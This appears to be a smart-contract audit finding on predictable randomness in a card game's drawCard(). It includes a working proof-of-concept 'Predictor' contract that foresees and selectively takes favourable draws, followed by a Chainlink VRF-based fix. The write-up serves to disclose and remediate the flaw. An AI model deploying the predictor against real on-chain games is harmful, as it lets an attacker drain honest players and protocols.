block.prevrandao and block.timestamp are not reliable sources of randomness, yet drawCard() and call() derive their random numbers from exactly these values.
The random value is produced by hashing block.timestamp, msg.sender, and block.prevrandao. None of these inputs is secret: block.timestamp and block.prevrandao are fixed for the whole block and visible to every transaction in it, and msg.sender is the caller's own address. An attacker therefore does not need to manipulate anything; computing the same hash from the same public inputs before (or within) the transaction is enough to know the outcome in advance. In particular, a contract can compute the hash, and only call drawCard() when the result is favorable (or revert otherwise), at no cost beyond gas.
So an attacker could exploit this weak randomness to draw favorable cards for themselves or force unfavorable cards on other players, breaking the integrity of the game.
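The predict-then-draw attack described above, as an added illustration that is not the audited contract: CardGame.drawCard() reconstructs the randomness derivation the finding describes (hash of block.timestamp, msg.sender and block.prevrandao; the card range of 52 and the modulo reduction are assumptions), and Predictor recomputes that hash in the same block using its own address, calling drawCard() only when the card it will receive is a favorable one. Contract names, FAVORABLE_MIN and the state layout are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the project's code. A minimal game whose drawCard()
// derives randomness the same way the finding describes. The 52-card range,
// the modulo reduction and all names are assumptions.
contract CardGame {
    mapping(address => uint8) public lastCard;

    function drawCard() external returns (uint8 card) {
        // Weak randomness: every input is public or chosen by the caller.
        uint256 seed = uint256(
            keccak256(abi.encodePacked(block.timestamp, msg.sender, block.prevrandao))
        );
        card = uint8(seed % 52);
        lastCard[msg.sender] = card;
    }
}

// Attacker contract: recomputes the exact same hash in the same block. When
// it calls game.drawCard(), msg.sender inside drawCard() is this contract's
// address, so address(this) stands in for msg.sender here.
contract Predictor {
    CardGame public immutable game;
    // Assumed threshold: only accept the four highest card values.
    uint8 public constant FAVORABLE_MIN = 48;

    constructor(CardGame _game) {
        game = _game;
    }

    // Identical derivation to CardGame.drawCard(); a view call, so it can be
    // evaluated off-chain for the pending block or on-chain just before drawing.
    function predict() public view returns (uint8) {
        uint256 seed = uint256(
            keccak256(abi.encodePacked(block.timestamp, address(this), block.prevrandao))
        );
        return uint8(seed % 52);
    }

    // Draw only when the outcome is already known to be favorable. When it is
    // not, the transaction simply does nothing and the attacker tries again
    // in a later block; nothing is lost except gas.
    function drawIfFavorable() external returns (bool drew, uint8 card) {
        card = predict();
        if (card < FAVORABLE_MIN) {
            return (false, card);
        }
        uint8 actual = game.drawCard();
        // Same block, same inputs, same hash: the prediction cannot miss.
        require(actual == card, "prediction mismatch");
        return (true, actual);
    }
}
```

The same effect is reachable without predicting at all: call drawCard(), inspect the stored card in the same transaction and revert if it is bad. Either way the protection block.prevrandao appears to give is illusory, because the value is fixed before any transaction in the block runs.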
A malicious attacker can manipulate the game logic in their own favor.
Loss of funds for honest players and for the protocol.
Manual review.
Use a secure randomness source such as Chainlink VRF. The random word is delivered by the oracle in a separate callback transaction, so the outcome of a draw cannot be inspected, and the draw cannot be aborted, in the transaction that requests it.
Randomness Manipulation: The randomness mechanism relies on block.timestamp, msg.sender, and block.prevrandao, which may be predictable in certain scenarios. Consider using Chainlink VRF or another oracle for more secure randomness.
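A hardened version of drawCard() along the lines recommended above, as an added example that is not the project's code. It uses the Chainlink VRF v2 request/fulfil pattern: drawCard() only requests a random word, and the card is assigned in fulfillRandomWords(), which VRFConsumerBaseV2 restricts to the coordinator. The import paths follow the @chainlink/contracts v0.8 package layout and may differ between package versions; the coordinator address, key hash, subscription id, gas limit and the 52-card range are deployment-specific assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example of the recommendation, not the project's code. Import paths
// assume the @chainlink/contracts v0.8 layout for VRF v2; adjust to the
// installed package version.
import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/vrf/interfaces/VRFCoordinatorV2Interface.sol";

contract CardGameVRF is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable coordinator;
    bytes32 private immutable keyHash;        // gas lane, assumed per deployment
    uint64 private immutable subscriptionId;  // funded VRF subscription, assumed
    uint16 private constant REQUEST_CONFIRMATIONS = 3;
    uint32 private constant CALLBACK_GAS_LIMIT = 100_000;
    uint32 private constant NUM_WORDS = 1;

    mapping(uint256 => address) public requestToPlayer; // requestId => player
    mapping(address => bool) public pendingDraw;
    mapping(address => uint8) public lastCard;

    event DrawRequested(address indexed player, uint256 requestId);
    event CardDrawn(address indexed player, uint8 card);

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subscriptionId)
        VRFConsumerBaseV2(_coordinator)
    {
        coordinator = VRFCoordinatorV2Interface(_coordinator);
        keyHash = _keyHash;
        subscriptionId = _subscriptionId;
    }

    // Step 1: the player commits to a draw. Nothing about the card is
    // computable here, so a predict-and-abort or draw-and-revert caller
    // gains nothing from calling this function.
    function drawCard() external returns (uint256 requestId) {
        require(!pendingDraw[msg.sender], "draw already pending");
        pendingDraw[msg.sender] = true;
        requestId = coordinator.requestRandomWords(
            keyHash,
            subscriptionId,
            REQUEST_CONFIRMATIONS,
            CALLBACK_GAS_LIMIT,
            NUM_WORDS
        );
        requestToPlayer[requestId] = msg.sender;
        emit DrawRequested(msg.sender, requestId);
    }

    // Step 2: called by the coordinator in a later transaction.
    // VRFConsumerBaseV2.rawFulfillRandomWords() enforces msg.sender == coordinator.
    // This callback must not revert: a reverted fulfilment is not retried.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        address player = requestToPlayer[requestId];
        if (player == address(0)) {
            return; // unknown or already-fulfilled request; ignore rather than revert
        }
        delete requestToPlayer[requestId];
        pendingDraw[player] = false;
        uint8 card = uint8(randomWords[0] % 52); // 52-card range is an assumption
        lastCard[player] = card;
        emit CardDrawn(player, card);
    }
}
```

The security property comes from the two-transaction split rather than from the oracle alone: whatever the player stakes on the draw must be locked in at request time, and the game must not let the player change or withdraw that stake between DrawRequested and CardDrawn, otherwise the outcome can once again be gamed after it becomes known.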